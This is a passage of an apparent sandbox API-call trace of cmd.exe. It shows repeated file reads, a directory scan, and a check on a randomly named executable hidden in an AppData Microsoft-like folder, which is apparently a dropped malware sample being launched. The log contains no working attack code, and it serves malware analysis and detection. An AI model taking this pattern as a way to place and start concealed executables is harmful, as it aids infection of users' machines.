[0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.585] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.585] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.585] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.586] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.586] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.586] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.587] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.587] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.587] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.588] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.588] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.588] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.613] _close (_FileHandle=4) returned 0 [0096.613] FindNextFileW (in: hFindFile=0x1a20b8, lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0) returned 0 [0096.614] GetLastError () returned 0x12 [0096.614] FindClose (in: hFindFile=0x1a20b8 | out: hFindFile=0x1a20b8) returned 1 [0096.614] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0096.651] _close (_FileHandle=3) returned 0 [0096.710] GetConsoleTitleW (in: lpConsoleTitle=0x18f35c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.710] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe\"")) returned 0xffffffff [0096.710] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0096.710] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0096.710] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0096.710] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0096.710] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0096.710] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0096.710] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0096.710] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0096.710] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0096.710] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0096.710] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0096.710] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0096.710] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0096.710] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0096.710] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0096.710] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0096.710] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0096.710] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0096.711] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0096.711] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0096.711] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0096.711] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0096.711] _wcsicmp 